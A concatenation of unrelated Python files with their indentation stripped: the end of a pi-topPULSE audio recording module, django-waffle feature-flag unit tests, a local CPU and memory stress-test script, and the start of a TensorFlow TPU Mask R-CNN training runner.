configuration.set_microphone_sample_rate_to_16khz()
def set_sample_rate_to_22khz():
"""Set the appropriate I2C bits to enable 22,050Hz recording on the
microphone."""
configuration.set_microphone_sample_rate_to_22khz()
def set_bit_rate_to_unsigned_8():
"""Set bitrate to device default."""
global _bitrate
_bitrate = 8
def set_bit_rate_to_signed_16():
"""Set bitrate to double that of device default by scaling the signal."""
global _bitrate
_bitrate = 16
#######################
# INITIALISATION #
#######################
_signal = signal.signal(signal.SIGINT, __signal_handler)
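# Minimal usage sketch (not part of the original module): it assumes a
# pi-topPULSE is attached with the serial port enabled, and simply captures a
# short clip when the module is run directly. The output filename is arbitrary.
if __name__ == "__main__":
    record()
    sleep(5)  # capture roughly five seconds of audio
    stop()
    save("recording.wav", overwrite=True)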
|
test_waffle.py
|
import logging
import random
import threading
import unittest
from django.contrib.auth import get_user_model
from django.conf import settings
from django.contrib.auth.models import AnonymousUser, Group
from django.db import connection, transaction
from django.test import RequestFactory, TransactionTestCase
from django.test.utils import override_settings
import mock
import waffle
from test_app import views
from test_app.models import CompanyAwareFlag, Company
from waffle.middleware import WaffleMiddleware
from waffle.models import Sample, Switch
from waffle.tests.base import TestCase
DATABASES = {'default', 'readonly'}
def get(**kw):
request = RequestFactory().get('/foo', data=kw)
request.user = AnonymousUser()
return request
def process_request(request, view):
response = view(request)
return WaffleMiddleware().process_response(request, response)
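# The helpers above build an anonymous GET request (get) and run a view through
# WaffleMiddleware (process_request) so waffle cookies are applied to the response.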
class WaffleTests(TestCase):
databases = DATABASES
def assert_flag_dynamically_created_with_value(self, expected_value):
FLAG_NAME = 'my_dynamically_created_flag'
flag_model = waffle.get_waffle_flag_model()
assert flag_model.objects.count() == 0
assert expected_value == waffle.flag_is_active(get(), FLAG_NAME)
assert flag_model.objects.count() == 1
flag = flag_model.objects.get(name=FLAG_NAME)
assert flag.name == FLAG_NAME
# We assert no queries are made to ensure flags created when the
# `CREATE_MISSING_FLAGS` setting is active are properly cached.
with self.assertNumQueries(0):
assert expected_value == waffle.flag_is_active(get(), FLAG_NAME)
def test_persist_active_flag(self):
waffle.get_waffle_flag_model().objects.create(name='myflag', percent='0.1')
request = get()
# Flag stays on.
request.COOKIES['dwf_myflag'] = 'True'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' in response.cookies
self.assertEqual('True', response.cookies['dwf_myflag'].value)
def test_persist_inactive_flag(self):
waffle.get_waffle_flag_model().objects.create(name='myflag', percent='99.9')
request = get()
# Flag stays off.
request.COOKIES['dwf_myflag'] = 'False'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' in response.cookies
self.assertEqual('False', response.cookies['dwf_myflag'].value)
def test_no_set_unused_flag(self):
"""An unused flag shouldn't have its cookie reset."""
request = get()
request.COOKIES['dwf_unused'] = 'True'
response = process_request(request, views.flag_in_view)
assert 'dwf_unused' not in response.cookies
def test_superuser(self):
"""Test the superuser switch."""
waffle.get_waffle_flag_model().objects.create(name='myflag', superusers=True)
request = get()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
superuser = get_user_model()(username='foo', is_superuser=True)
request.user = superuser
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
non_superuser = get_user_model()(username='bar', is_superuser=False)
non_superuser.save()
request.user = non_superuser
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
def test_staff(self):
"""Test the staff switch."""
waffle.get_waffle_flag_model().objects.create(name='myflag', staff=True)
request = get()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
staff = get_user_model()(username='foo', is_staff=True)
request.user = staff
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
non_staff = get_user_model()(username='foo', is_staff=False)
non_staff.save()
request.user = non_staff
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
def test_languages(self):
waffle.get_waffle_flag_model().objects.create(name='myflag', languages='en,fr')
request = get()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
request.LANGUAGE_CODE = 'en'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
request.LANGUAGE_CODE = 'de'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
def test_user(self):
"""Test the per-user switch."""
user = get_user_model().objects.create(username='foo')
flag = waffle.get_waffle_flag_model().objects.create(name='myflag')
flag.users.add(user)
request = get()
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model().objects.create(username='someone_else')
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
# Unsetting the flag on a user should have an effect.
flag.users.remove(user)
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
def test_remove_from_user(self):
"""Same operation of `test_user` but performed with reverse relation"""
user = get_user_model().objects.create(username='foo')
flag = waffle.get_waffle_flag_model().objects.create(name='myflag')
flag.users.add(user)
request = get()
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model().objects.create(username='someone_else')
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
# Unsetting the flag on a user should have an effect.
user.flag_set.remove(flag)
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
def test_group(self):
"""Test the per-group switch."""
group = Group.objects.create(name='foo')
user = get_user_model().objects.create(username='bar')
user.groups.add(group)
flag = waffle.get_waffle_flag_model().objects.create(name='myflag')
flag.groups.add(group)
request = get()
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model()(username='someone_else')
request.user.save()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
# Unsetting the flag on a group should have an effect.
flag.groups.remove(group)
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
def test_remove_from_group(self):
"""Same operation of `test_group` but performed with reverse relation"""
group = Group.objects.create(name='foo')
user = get_user_model().objects.create(username='bar')
user.groups.add(group)
flag = waffle.get_waffle_flag_model().objects.create(name='myflag')
flag.groups.add(group)
request = get()
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model()(username='someone_else')
request.user.save()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
# Unsetting the flag on a group should have an effect.
group.flag_set.remove(flag)
request.user = user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
def test_authenticated(self):
"""Test the authenticated/anonymous switch."""
waffle.get_waffle_flag_model().objects.create(name='myflag', authenticated=True)
request = get()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model()(username='foo')
assert request.user.is_authenticated
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
def test_everyone_on(self):
"""Test the 'everyone' switch on."""
waffle.get_waffle_flag_model().objects.create(name='myflag', everyone=True)
request = get()
request.COOKIES['dwf_myflag'] = 'False'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model()(username='foo')
assert request.user.is_authenticated
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
def test_everyone_off(self):
"""Test the 'everyone' switch off."""
waffle.get_waffle_flag_model().objects.create(name='myflag', everyone=False, authenticated=True)
request = get()
request.COOKIES['dwf_myflag'] = 'True'
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
request.user = get_user_model()(username='foo')
assert request.user.is_authenticated
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
def test_percent(self):
"""If you have no cookie, you get a cookie!"""
waffle.get_waffle_flag_model().objects.create(name='myflag', percent='50.0')
request = get()
response = process_request(request, views.flag_in_view)
assert 'dwf_myflag' in response.cookies
@mock.patch.object(random, 'uniform')
def test_reroll(self, uniform):
"""Even without a cookie, calling flag_is_active twice should return
the same value."""
waffle.get_waffle_flag_model().objects.create(name='myflag', percent='50.0')
# Make sure we're not really random.
request = get() # Create a clean request.
assert not hasattr(request, 'waffles')
uniform.return_value = '10' # < 50. Flag is True.
assert waffle.flag_is_active(request, 'myflag')
assert hasattr(request, 'waffles') # We should record this flag.
assert 'myflag' in request.waffles
assert request.waffles['myflag'][0]
uniform.return_value = '70' # > 50. Normally, Flag would be False.
assert waffle.flag_is_active(request, 'myflag')
assert request.waffles['myflag'][0]
def test_undefined(self):
"""Undefined flags are always false."""
request = get()
assert not waffle.flag_is_active(request, 'foo')
@override_settings(WAFFLE_FLAG_DEFAULT=True)
def test_undefined_default(self):
"""WAFFLE_FLAG_DEFAULT controls undefined flags."""
request = get()
assert waffle.flag_is_active(request, 'foo')
@override_settings(WAFFLE_OVERRIDE=True)
def test_override(self):
request = get(foo='1')
waffle.get_waffle_flag_model().objects.create(name='foo') # Off for everyone.
assert waffle.flag_is_active(request, 'foo')
def test_testing_flag(self):
waffle.get_waffle_flag_model().objects.create(name='foo', testing=True)
request = get(dwft_foo='1')
assert waffle.flag_is_active(request, 'foo')
assert 'foo' in request.waffle_tests
assert request.waffle_tests['foo']
# GET param should override cookie
request = get(dwft_foo='0')
request.COOKIES['dwft_foo'] = 'True'
assert not waffle.flag_is_active(request, 'foo')
assert 'foo' in request.waffle_tests
assert not request.waffle_tests['foo']
def test_testing_disabled_flag(self):
waffle.get_waffle_flag_model().objects.create(name='foo')
request = get(dwft_foo='1')
assert not waffle.flag_is_active(request, 'foo')
assert not hasattr(request, 'waffle_tests')
request = get(dwft_foo='0')
assert not waffle.flag_is_active(request, 'foo')
assert not hasattr(request, 'waffle_tests')
def test_testing_flag_header(self):
waffle.get_waffle_flag_model().objects.create(name='foo', testing=True)
request = RequestFactory().get('/foo', HTTP_DWFT_FOO='1')
request.user = AnonymousUser()
assert waffle.flag_is_active(request, 'foo')
assert 'foo' in request.waffle_tests
assert request.waffle_tests['foo']
# header should override cookie
request = RequestFactory().get('/foo', HTTP_DWFT_FOO='0')
request.user = AnonymousUser()
request.COOKIES['dwft_foo'] = 'True'
assert not waffle.flag_is_active(request, 'foo')
assert 'foo' in request.waffle_tests
assert not request.waffle_tests['foo']
def test_set_then_unset_testing_flag(self):
waffle.get_waffle_flag_model().objects.create(name='myflag', testing=True)
response = self.client.get('/flag_in_view?dwft_myflag=1')
self.assertEqual(b'on', response.content)
response = self.client.get('/flag_in_view')
self.assertEqual(b'on', response.content)
response = self.client.get('/flag_in_view?dwft_myflag=0')
self.assertEqual(b'off', response.content)
response = self.client.get('/flag_in_view')
self.assertEqual(b'off', response.content)
response = self.client.get('/flag_in_view?dwft_myflag=1')
self.assertEqual(b'on', response.content)
@override_settings(DATABASE_ROUTERS=['waffle.tests.base.ReplicationRouter'])
def test_everyone_on_read_from_write_db(self):
flag = waffle.get_waffle_flag_model().objects.create(name='myflag', everyone=True)
request = get()
response = process_request(request, views.flag_in_view)
# By default, flag_is_active should hit whatever is configured as the
# read DB (so values will be stale if replication is lagged).
self.assertEqual(b'off', response.content)
with override_settings(WAFFLE_READ_FROM_WRITE_DB=True):
# Save the flag again to flush the cache.
flag.save()
# The next read should now be directed to the write DB, ensuring
# the cache and DB are in sync.
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
@override_settings(WAFFLE_FLAG_MODEL='test_app.CompanyAwareFlag', AUTH_USER_MODEL='test_app.CompanyUser')
def test_pluggable_model(self):
flag_model = waffle.get_waffle_flag_model()
self.assertEqual(CompanyAwareFlag, flag_model)
acme_company = Company.objects.create(name='Acme Ltd.')
feline_company = Company.objects.create(name='Feline LLC')
acme_company_flag = waffle.get_waffle_flag_model().objects.create(name='myflag', superusers=True)
acme_company_flag.companies.add(acme_company)
request = get()
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
acme_user = get_user_model()(username='acme.mcfield', company=acme_company)
request.user = acme_user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'on', response.content)
assert 'dwf_myflag' not in response.cookies
feline_user = get_user_model()(username='acme.mcfield', company=feline_company)
request.user = feline_user
response = process_request(request, views.flag_in_view)
self.assertEqual(b'off', response.content)
assert 'dwf_myflag' not in response.cookies
@override_settings(WAFFLE_CREATE_MISSING_FLAGS=True)
@override_settings(WAFFLE_FLAG_DEFAULT=False)
def test_flag_created_dynamically_default_false(self):
self.assert_flag_dynamically_created_with_value(False)
@override_settings(WAFFLE_CREATE_MISSING_FLAGS=True)
@override_settings(WAFFLE_FLAG_DEFAULT=True)
def test_flag_created_dynamically_default_true(self):
self.assert_flag_dynamically_created_with_value(True)
@override_settings(WAFFLE_CREATE_MISSING_FLAGS=True)
@override_settings(WAFFLE_FLAG_DEFAULT=True)
def test_flag_created_dynamically_upon_retrieval(self):
FLAG_NAME = 'myflag'
flag_model = waffle.get_waffle_flag_model()
flag = flag_model.get(FLAG_NAME)
assert flag.is_active(get())
assert flag_model.objects.filter(name=FLAG_NAME).exists()
@mock.patch('waffle.models.logger')
def test_no_logging_missing_flag_by_default(self, mock_logger):
request = get()
waffle.flag_is_active(request, 'foo')
self.assertEqual(mock_logger.log.call_count, 0)
@override_settings(WAFFLE_LOG_MISSING_FLAGS=logging.WARNING)
@mock.patch('waffle.models.logger')
def test_logging_missing_flag(self, mock_logger):
request = get()
waffle.flag_is_active(request, 'foo')
mock_logger.log.assert_called_with(logging.WARNING, 'Flag %s not found', 'foo')
class SwitchTests(TestCase):
databases = DATABASES
def assert_switch_dynamically_created_with_value(self, expected_value):
SWITCH_NAME = 'my_dynamically_created_switch'
assert Switch.objects.count() == 0
assert expected_value == waffle.switch_is_active(SWITCH_NAME)
assert Switch.objects.count() == 1
switch = Switch.objects.get(name=SWITCH_NAME)
assert switch.name == SWITCH_NAME
assert expected_value == switch.active
# We assert no queries are made to ensure switches created when the
# `CREATE_MISSING_SWITCHES` setting is active are properly cached.
with self.assertNumQueries(0):
assert expected_value == waffle.switch_is_active(SWITCH_NAME)
def test_switch_active(self):
switch = Switch.objects.create(name='myswitch', active=True)
assert waffle.switch_is_active(switch.name)
def test_switch_inactive(self):
switch = Switch.objects.create(name='myswitch', active=False)
assert not waffle.switch_is_active(switch.name)
def test_switch_active_from_cache(self):
"""Do not make two queries for an existing active switch."""
switch = Switch.objects.create(name='myswitch', active=True)
# Get the value once so that it will be put into the cache
assert waffle.switch_is_active(switch.name)
queries = len(connection.queries)
assert waffle.switch_is_active(switch.name)
self.assertEqual(queries, len(connection.queries))
def test_switch_inactive_from_cache(self):
"""Do not make two queries for an existing inactive switch."""
switch = Switch.objects.create(name='myswitch', active=False)
# Get the value once so that it will be put into the cache
assert not waffle.switch_is_active(switch.name)
queries = len(connection.queries)
assert not waffle.switch_is_active(switch.name)
self.assertEqual(queries, len(connection.queries))
def test_undefined(self):
assert not waffle.switch_is_active('foo')
@override_settings(WAFFLE_SWITCH_DEFAULT=True)
def test_undefined_default(self):
assert waffle.switch_is_active('foo')
@override_settings(DEBUG=True)
def test_no_query(self):
"""Do not make two queries for a non-existent switch."""
assert not Switch.objects.filter(name='foo').exists()
queries = len(connection.queries)
assert not waffle.switch_is_active('foo')
assert len(connection.queries) > queries
queries = len(connection.queries)
assert not waffle.switch_is_active('foo')
self.assertEqual(queries, len(connection.queries))
@override_settings(DATABASE_ROUTERS=['waffle.tests.base.ReplicationRouter'])
def test_read_from_write_db(self):
switch = Switch.objects.create(name='switch', active=True)
# By default, switch_is_active should hit whatever is configured as the
# read DB (so values will be stale if replication is lagged).
assert not waffle.switch_is_active(switch.name)
with override_settings(WAFFLE_READ_FROM_WRITE_DB=True):
# Save the switch again to flush the cache.
switch.save()
# The next read should now be directed to the write DB, ensuring
# the cache and DB are in sync.
assert waffle.switch_is_active(switch.name)
@override_settings(WAFFLE_CREATE_MISSING_SWITCHES=True)
@override_settings(WAFFLE_SWITCH_DEFAULT=False)
def test_switch_created_dynamically_false(self):
self.assert_switch_dynamically_created_with_value(False)
@override_settings(WAFFLE_CREATE_MISSING_SWITCHES=True)
@override_settings(WAFFLE_SWITCH_DEFAULT=True)
def test_switch_created_dynamically_true(self):
self.assert_switch_dynamically_created_with_value(True)
@mock.patch('waffle.models.logger')
def test_no_logging_missing_switch_by_default(self, mock_logger):
waffle.switch_is_active('foo')
self.assertEqual(mock_logger.log.call_count, 0)
@override_settings(WAFFLE_LOG_MISSING_SWITCHES=logging.WARNING)
@mock.patch('waffle.models.logger')
def test_logging_missing_switch(self, mock_logger):
waffle.switch_is_active('foo')
mock_logger.log.assert_called_with(logging.WARNING, 'Switch %s not found', 'foo')
class SampleTests(TestCase):
databases = DATABASES
def assert_sample_dynamically_created_with_value(self, is_active, expected_value):
SAMPLE_NAME = 'my_dynamically_created_sample'
assert Sample.objects.count() == 0
assert is_active == waffle.sample_is_active(SAMPLE_NAME)
assert Sample.objects.count() == 1
sample = Sample.objects.get(name=SAMPLE_NAME)
assert sample.name == SAMPLE_NAME
assert sample.percent == expected_value
# We assert no queries are made to ensure samples created when the
# `CREATE_MISSING_SAMPLES` setting is active are properly cached.
with self.assertNumQueries(0):
assert is_active == waffle.sample_is_active(SAMPLE_NAME)
def test_sample_100(self):
sample = Sample.objects.create(name='sample', percent='100.0')
assert waffle.sample_is_active(sample.name)
def test_sample_0(self):
sample = Sample.objects.create(name='sample', percent='0.0')
assert not waffle.sample_is_active(sample.name)
def test_undefined(self):
assert not waffle.sample_is_active('foo')
@override_settings(WAFFLE_SAMPLE_DEFAULT=True)
def test_undefined_default(self):
assert waffle.sample_is_active('foo')
@override_settings(DATABASE_ROUTERS=['waffle.tests.base.ReplicationRouter'])
def test_read_from_write_db(self):
sample = Sample.objects.create(name='sample', percent='100.0')
# By default, sample_is_active should hit whatever is configured as the
# read DB (so values will be stale if replication is lagged).
assert not waffle.sample_is_active(sample.name)
with override_settings(WAFFLE_READ_FROM_WRITE_DB=True):
# Save the sample again to flush the cache.
sample.save()
# The next read should now be directed to the write DB, ensuring
# the cache and DB are in sync.
assert waffle.sample_is_active(sample.name)
@override_settings(WAFFLE_CREATE_MISSING_SAMPLES=True)
@override_settings(WAFFLE_SAMPLE_DEFAULT=False)
def test_sample_created_dynamically_default_false(self):
self.assert_sample_dynamically_created_with_value(False, 0.0)
@override_settings(WAFFLE_CREATE_MISSING_SAMPLES=True)
@override_settings(WAFFLE_SAMPLE_DEFAULT=True)
def test_sample_created_dynamically_default_true(self):
self.assert_sample_dynamically_created_with_value(True, 100.0)
@mock.patch('waffle.models.logger')
def test_no_logging_missing_sample_by_default(self, mock_logger):
waffle.sample_is_active('foo')
self.assertEqual(mock_logger.log.call_count, 0)
@override_settings(WAFFLE_LOG_MISSING_SAMPLES=logging.WARNING)
@mock.patch('waffle.models.logger')
def test_logging_missing_sample(self, mock_logger):
waffle.sample_is_active('foo')
mock_logger.log.assert_called_with(logging.WARNING, 'Sample %s not found', 'foo')
class TransactionTestMixin(object):
"""Mixin providing an abstract test case for writing in a transaction.
"""
def create_toggle(self):
"""Create an inactive feature toggle (i.e. flag, switch, sample)."""
raise NotImplementedError
def flip_toggle(self, toggle):
"""Flip the toggle to an active state."""
raise NotImplementedError
def toggle_is_active(self, toggle):
"""Use the built-in *_is_active helper to check the toggle's state."""
raise NotImplementedError
@unittest.skipIf('sqlite3' in settings.DATABASES['default']['ENGINE'],
'This test uses threads, which the sqlite3 DB engine '
'does not support.')
def test_flip_toggle_in_transaction(self):
"""Wait to invalidate the cache until after the current transaction.
This test covers a potential race condition where, if the cache were
flushed in the middle of a transaction, the next read from the database
(before the transaction is committed) would get a stale value and cache
it. See #296 for more context.
"""
toggle = self.create_toggle()
self.addCleanup(toggle.delete)
written_in_background_thread = threading.Event()
read_in_main_thread = threading.Event()
@transaction.atomic
def update_toggle():
self.flip_toggle(toggle)
# Signal to the main thread that the toggle has been updated, but
# the transaction is not yet committed.
written_in_background_thread.set()
# Pause here to allow the main thread to make an assertion.
read_in_main_thread.wait(timeout=1)
# Start a background thread to update the toggle in a transaction.
t = threading.Thread(target=update_toggle)
t.daemon = True
t.start()
# After the toggle is updated but before the transaction is committed,
# the cache will still have the previous value.
written_in_background_thread.wait(timeout=1)
assert not self.toggle_is_active(toggle)
# After the transaction is committed, the cache should have been
# invalidated, hence the next call to *_is_active should have the
# correct value.
read_in_main_thread.set()
t.join(timeout=1)
assert self.toggle_is_active(toggle)
class FlagTransactionTests(TransactionTestMixin, TransactionTestCase):
def create_toggle(self):
return waffle.get_waffle_flag_model().objects.create(
name='transaction-flag-name', everyone=False
)
def flip_toggle(self, flag):
flag.everyone = True
flag.save()
def toggle_is_active(self, flag):
return waffle.flag_is_active(get(), flag.name)
class SwitchTransactionTests(TransactionTestMixin, TransactionTestCase):
def create_toggle(self):
return Switch.objects.create(name='transaction-switch-name',
active=False)
def flip_toggle(self, switch):
switch.active = True
switch.save()
def toggle_is_active(self, switch):
return waffle.switch_is_active(switch.name)
class SampleTransactionTests(TransactionTestMixin, TransactionTestCase):
def create_toggle(self):
return Sample.objects.create(name='transaction-sample-name', percent=0)
def flip_toggle(self, sample):
sample.percent = 100
sample.save()
def toggle_is_active(self, sample):
return waffle.sample_is_active(sample.name)
|
stress_test.py
|
from multiprocessing import Process, active_children, Pipe
import os
import signal
import sys
import time
import psutil
DEFAULT_TIME = 60
TOTAL_CPU = psutil.cpu_count(logical=True)
DEFAULT_MEMORY = (psutil.virtual_memory().total >> 20)*1000
PERCENT = 100
GIGA = 2 ** 30
MEGA = 2 ** 20
def loop(conn, affinity, check):
'''
Function to stress cores to run at 100%
Arguments:
conn : child connection which is an object of Pipe()
affinity: list of cores to assign affinity for the process
check : conditional flag to enable real time calibration
'''
proc = psutil.Process()
proc_info = proc.pid
msg = "Process ID: "+str(proc_info)+" CPU: "+str(affinity[0]) #Create a message string of PID and core number
conn.send(msg) #Send message to parent
conn.close()
proc.cpu_affinity(affinity) #Assigns a core to process
while True:
# Conditional check for calibration
if(check and psutil.cpu_percent()>PERCENT):
time.sleep(0.05) #Change the time for finetuning
1*1
def last_core_loop(conn, affinity, percent):
'''
Function to stress the last core at fractional percentage.
e.g. core 5 at 45% Usage
Arguments:
conn : child connection which is an object of Pipe()
affinity: list of cores to assign affinity for the process
percent : fractional percentage to run the core at
'''
proc = psutil.Process()
proc_info = proc.pid
msg = "Process ID: "+str(proc_info)+" CPU: "+str(affinity[0]) #Create a message string of PID and core number
conn.send(msg) #Send message to parent
conn.close()
proc.cpu_affinity(affinity) #Assigns a core to process
while True:
# Conditional check for core calibration
if(psutil.cpu_percent(percpu=True)[affinity[0]] > percent):
time.sleep(0.1) #Change the time for finetuning
1*1
def sigint_handler(signum, frame):
'''
Function to handle keyboard interrupt
'''
procs = active_children() #Retrieve list of active processes
for p in procs:
p.terminate()
os._exit(1)
signal.signal(signal.SIGINT, sigint_handler)
def get_args():
'''
Function to assign commandline arguments if passed.
Returns:
exec_time : Execution time in seconds, default = 60
proc_num : Number of processors required according
to the percentage input by the user.
Default = total cpu count of the system
memory : Memory in Megabytes to be consumed.
Default = Total system memory
percent : Percentage of CPU to be used
'''
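# Example invocation (illustrative values): "python stress_test.py 75 120 2048"
# targets ~75% of total CPU for 120 seconds and fills RAM until overall system
# usage reaches about 2048 MB.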
exec_time = DEFAULT_TIME
proc_num = TOTAL_CPU
percent = 100
memory = DEFAULT_MEMORY
if(len(sys.argv) > 4):
raise ValueError("expected at most 3 arguments") #If user enters more than 3 arguments
if(len(sys.argv) == 2):
percent = int(sys.argv[1]) #CPU usage
if(percent > 100): #If user enters more than 100% usage
raise ValueError("CPU percent cannot exceed 100")
proc_num = (percent * TOTAL_CPU)/100 #Convert CPU usage into number of cores
if(len(sys.argv) == 3):
percent = int(sys.argv[1])
if(percent > 100):
raise ValueError("CPU percent cannot exceed 100")
proc_num = (percent * TOTAL_CPU)/100
exec_time = int(sys.argv[2]) #Execution time
if(len(sys.argv) == 4):
percent = int(sys.argv[1])
proc_num = (percent * TOTAL_CPU)/100
exec_time = int(sys.argv[2])
memory = int(sys.argv[3]) #Memory amount
if(percent > 100 or memory > DEFAULT_MEMORY):
raise ValueError("CPU percent or memory out of allowed range")
return exec_time, proc_num, percent, memory
def pmem():
'''
Function to display memory statistics
'''
vm = psutil.virtual_memory() #Field count varies by platform, so access fields by name
tot, avail, percent, used, free = vm.total, vm.available, vm.percent, vm.used, vm.free
tot, avail, used, free = tot / GIGA, avail / GIGA, used / GIGA, free / GIGA
print("---------------------------------------")
print("Memory Stats: total = %s GB \navail = %s GB \nused = %s GB \nfree = %s GB \npercent = %s"
% (tot, avail, used, free, percent))
def alloc_max_str(memory):
'''
Function to load memory by assigning string of requested size
Arguments:
memory: amount of memory to be utilized in MB
Returns:
a : String of size 'memory'
'''
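# Grow a throwaway string in 256 MiB steps until overall system memory usage
# exceeds the requested amount (or allocation fails with MemoryError).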
i = 0
a = ''
while True:
try:
a = ' ' * (i * 256 * MEGA)
if((psutil.virtual_memory().used >> 20) > memory):
break
del a
except MemoryError:
break
i += 1
return a
def memory_stress(memory, exec_time):
'''
Function to stress memory and display memory Stats
Arguments:
memory: amount of memory to be utilized in MB
exec_time: time for which the system is supposed to keep the object
Returns:
a : String of size 'memory'
'''
pmem()
a = alloc_max_str(memory)
pmem()
print("Memory Filled:")
print("Waiting for %d sec"%(exec_time))
return a
def _main():
'''
Function to stress CPU and Memory
'''
try:
exec_time, proc_num, cpu_percent, memory = get_args()
global PERCENT
PERCENT = cpu_percent
except:
msg = "Usage: stress_test [CPU percent] [exec_time] [Memory in MB]"
sys.stderr.write(msg)
constraints = "\nCPU < 100 and memory < "+str(DEFAULT_MEMORY)
sys.stderr.write(constraints)
sys.exit(1)
procs = []
conns = []
print("CPU and Memory Stress in progress:")
'''
Memory Stress call:
'''
a = memory_stress(memory, exec_time)
'''
CPU Stress logic:
'''
print("Stressing %f cores:"%(proc_num))
actual_cores = int(proc_num)
last_core_usage = round((proc_num-actual_cores),2)*100
proc_num = actual_cores
#Run the required cores at 100% except one
for i in range(proc_num-1):
parent_conn, child_conn = Pipe()
p = Process(target=loop, args=(child_conn,[i], False))
p.start()
procs.append(p)
conns.append(parent_conn)
#Run the last core out of the required cores to balance total output by actively calibrating realtime usage
parent_conn, child_conn = Pipe()
p = Process(target=loop, args=(child_conn,[proc_num-1], True))
p.start()
procs.append(p)
conns.append(parent_conn)
#If CPU usage is not 100%, run the fractional part of the last core
if(proc_num!=TOTAL_CPU):
last_core = proc_num
parent_conn, child_conn = Pipe()
p = Process(target=last_core_loop, args=(child_conn, [last_core], last_core_usage))
p.start()
procs.append(p)
conns.append(parent_conn)
#Print PID and core messages sent by the children
for conn in conns:
try:
print(conn.recv())
except EOFError:
continue
#Carry out the execution for exec_time
time.sleep(exec_time)
#delete memory load
del a
#Terminate child processes
for p in procs:
p.terminate()
if __name__ == "__main__":
_main()
|
train_and_eval_low_level_runner.py
|
# Copyright 2018 Google. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train_and_eval MaskRcnn with low level API."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import os
import threading
import time
import six
import tensorflow as tf
from tensorflow.contrib.tpu.python.tpu import device_assignment as tpu_device_assignment
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import tpu_function
from tensorflow.python.framework import graph_io
import eval_multiprocess
import mask_rcnn_params
import runner_utils
from mlp_log import mlp_log
_INITIAL_LOSS = 1e7
_STOP = -1
_MAX_NUM_CHECKPOINT_THREADS = 1
# for spatial partition
_NUM_CORES_TO_COMPUTATION_SHAPE = {
1: [1, 1, 1],
2: [1, 1, 2],
4: [1, 2, 2],
8: [2, 2, 2],
16: [4, 2, 2],
}
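# The table above maps cores-per-replica to the 3-D block of TPU cores a single
# replica occupies in the device topology; e.g. 8 cores per replica means each
# replica spans a 2 x 2 x 2 block of cores.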
class TrainEvalLowLevelRunner(object):
"""Run Train via direct session.run calls."""
def __init__(self, tpu_cluster_resolver, train_params, eval_params,
eval_steps, eval_metric, input_partition_dims=None,
num_cores_per_replica=None, tpu_job_name=None):
tf.logging.info("TrainLowLevelRunner: constructor")
self.tpu_cluster_resolver = tpu_cluster_resolver
self.eval_metric = eval_metric
self.train_params = train_params
self.eval_params = eval_params
self.train_params["batch_size"] = (
train_params["train_batch_size"] // train_params["num_shards"])
self.eval_params["batch_size"] = (
eval_params["eval_batch_size"] // eval_params["num_shards"])
self.tpu_job_name = tpu_job_name
self.model_dir = train_params["model_dir"]
self.iterations_per_loop = train_params["iterations_per_loop"]
